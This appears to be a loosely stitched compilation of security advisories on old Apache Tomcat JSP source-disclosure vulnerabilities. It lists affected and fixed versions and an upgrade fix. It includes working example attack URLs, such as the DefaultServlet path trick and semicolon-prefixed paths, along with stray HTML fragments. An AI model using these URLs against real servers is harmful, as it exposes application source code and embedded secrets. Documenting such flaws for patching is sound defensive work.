Try to get the source
Apache Software Foundation Tomcat 3.2.4 Apache Software Foundation Tomcat 3.2.3
http://example.com:80/examples/jsp/source.jsp?? http://example.com:80/examples/jsp/source.jsp?/jsp/
href=”http://localhost/serendipity/from%20http://www.securityfocus.com/bid/4876/exploit“>http://www.securityfocus.com/bid/4876/exploit</a></blockquote>
Apache Software Foundation Tomcat 4.X
[SECURITY] Apache Tomcat 4.x JSP source disclosure vulnerability
2. Details
Let say you have valid URL like
http://my.site/login.jsp
then an URL like
http://my.site/servlet/org.apache.catalina.servlets.DefaultServlet/login.jsp
will give you the source code of the JSP page. The full syntaxes of the exposure URL is:
http://{server}[:port]/[Context/]org.apache.catalina.servlets.Default Servlet/[context_relative_path/]file_name.jsp
For example to see the JSP source of Tomcat 4.1.10 admin application
http://localhost:8080/admin/index.jsp
execute
http://localhost:8080/admin/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
<a href=”http://marc.theaimsgroup.com/?l=tomcat-user&m=103417249925541&w=2“>http://marc.theaimsgroup.com/?l=tomcat-user&m=103417249925541&w=2</a>
Vulnerable Systems:
* Apache Tomcat version 5.0.28
* Apache Tomcat version 5.5.12
* Apache Tomcat version 5.5.9
* Apache Tomcat version 5.5.7
Immune Systems:
* Apache Tomcat version 5.5.17
Examples:
The following URLs will trigger the vulnerability:
http://www.sitexyz.com/;index.jsp
http://www.sitexyz.com/help/;help.do
Solution:
Upgrade to the latest stable Tomcat release. Confirmed fix is available in Apache Tomcat version 5.5.17.